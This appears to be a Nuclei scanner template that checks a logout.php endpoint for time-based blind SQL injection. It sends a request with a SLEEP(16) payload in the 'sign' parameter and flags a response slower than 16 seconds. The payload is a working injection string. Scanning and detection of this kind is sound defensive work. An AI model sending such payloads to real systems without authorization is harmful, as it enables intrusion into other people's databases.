http:
    - matchers:
        - status:
            - 200
          type: status
        - dsl:
            - duration>16000
          type: dsl
      matchers-condition: and
      raw:
        - |
          GET /custom/zx/logout.php?sign=1'+AND+(SELECT+4068+FROM+(SELECT(SLEEP(16)))Vgsc)--+qhh HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Nuclei-Scanner
          Accept: */*
id: sql-injection-test
info:
    author: ProjectDiscoveryAI
    description: |
        This template tests for SQL injection vulnerability in the `logout.php` endpoint by injecting a payload that introduces a sleep condition.
    name: SQL Injection Test in logout.php
    severity: critical
    tags:
        - critical
